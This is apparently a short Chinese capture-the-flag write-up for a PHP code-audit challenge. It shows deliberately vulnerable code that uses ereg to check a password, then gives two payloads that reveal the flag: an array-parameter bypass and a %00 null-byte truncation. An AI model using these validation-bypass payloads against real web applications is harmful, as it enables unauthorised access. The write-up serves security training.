buku---PHP代码审计—ereg正则%00截断
怀宇
buku—PHP代码审计—ereg正则%00截断
<?php
$flag = "xxx";
if (isset ($_GET['password']))
{
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
{
echo '
You password must be alphanumeric
';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '-') !== FALSE) //strpos — 查找字符串首次出现的位置
{
die('Flag: ' . $flag);
}
else
{
echo('
- have not been found
');
}
}
else
{
echo '
Invalid password
';
}
}
?>
看似题目%00截断,实则直接数组绕过也可:
payload:?password[]=1
payload2:?password=1e9%00*-*
类似资料: